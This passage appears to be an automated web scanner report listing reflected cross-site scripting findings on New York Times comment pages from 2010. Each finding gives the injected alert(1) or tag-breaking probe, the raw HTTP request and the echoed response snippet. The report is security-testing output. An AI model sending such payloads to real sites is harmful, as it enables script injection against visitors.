<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Book Re ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'commentsd604c'-alert(1)-'959e8c51a4'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.99. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0ae8"><a>8de1386f669 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comd0ae8"><a>8de1386f669/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34121
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Book Re ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comd0ae8"><a>8de1386f669/yr/mo/day/book-review-podcast-the-emperor-of-all-maladies/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,B ...[SNIP]...
3.100. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39b70"-alert(1)-"15696141ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/?39b70"-alert(1)-"15696141ef9=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70687
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Book Re ...[SNIP]... obal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142919"; var s_pagename = "2010/11/12/book-review-podcast-the-emperor-of-all-maladies/?39b70"-alert(1)-"15696141ef9=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.101. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f44b'-alert(1)-'ffb7079026e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments6f44b'-alert(1)-'ffb7079026e/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71428
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Here Co ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments6f44b'-alert(1)-'ffb7079026e'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.102. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a761b"><a>0b788a6f155 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsa761b"><a>0b788a6f155/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71340
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Here Co ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsa761b"><a>0b788a6f155/artsbeat.blogs.nytimes.com/yr/mo/day/here-comes-rhymin-simon-on-a-different-label/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2 ...[SNIP]...
3.103. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e568"><a>5f636f3fe12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com8e568"><a>5f636f3fe12/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34004
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Here Co ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com8e568"><a>5f636f3fe12/yr/mo/day/here-comes-rhymin-simon-on-a-different-label/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bott ...[SNIP]...
3.104. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ef0"-alert(1)-"0efdcf8adda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/?28ef0"-alert(1)-"0efdcf8adda=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70837
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Here Co ...[SNIP]... sglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_143041"; var s_pagename = "2010/11/12/here-comes-rhymin-simon-on-a-different-label/?28ef0"-alert(1)-"0efdcf8adda=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.105. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e835'-alert(1)-'6462f262221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments8e835'-alert(1)-'6462f262221/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 83378
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Kanye W ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments8e835'-alert(1)-'6462f262221'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.106. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf869"><a>05cee7fdfb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentscf869"><a>05cee7fdfb2/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 83360
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Kanye W ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentscf869"><a>05cee7fdfb2/artsbeat.blogs.nytimes.com/yr/mo/day/kanye-west-was-coached-for-today-interview-gone-awry/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_ass ...[SNIP]...
3.107. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ba3"><a>7ad4e47b7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comf3ba3"><a>7ad4e47b7bb/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34445
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Kanye W ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comf3ba3"><a>7ad4e47b7bb/yr/mo/day/kanye-west-was-coached-for-today-interview-gone-awry/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bott ...[SNIP]...
3.108. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8483d"-alert(1)-"5bab4140001 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?8483d"-alert(1)-"5bab4140001=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 81137
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Kanye W ...[SNIP]... nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_143059"; var s_pagename = "2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?8483d"-alert(1)-"5bab4140001=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.109. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52017'-alert(1)-'7d721cbfae3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments52017'-alert(1)-'7d721cbfae3/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82778
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Proposa ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments52017'-alert(1)-'7d721cbfae3'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.110. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7646f"><a>ff2a52994e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments7646f"><a>ff2a52994e8/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 82760
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Proposa ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments7646f"><a>ff2a52994e8/artsbeat.blogs.nytimes.com/yr/mo/day/proposal-recommends-charging-admission-at-the-smithsonian/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crn ...[SNIP]...
3.111. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a88"><a>97992b80823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com59a88"><a>97992b80823/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34566
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Proposa ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com59a88"><a>97992b80823/yr/mo/day/proposal-recommends-charging-admission-at-the-smithsonian/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5 ...[SNIP]...
3.112. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caa14"-alert(1)-"f0d8d5fb934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/?caa14"-alert(1)-"f0d8d5fb934=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 80401
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Proposa ...[SNIP]... tsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_143063"; var s_pagename = "2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/?caa14"-alert(1)-"f0d8d5fb934=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.113. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 742aa'-alert(1)-'d3686b770d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments742aa'-alert(1)-'d3686b770d1/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 70962
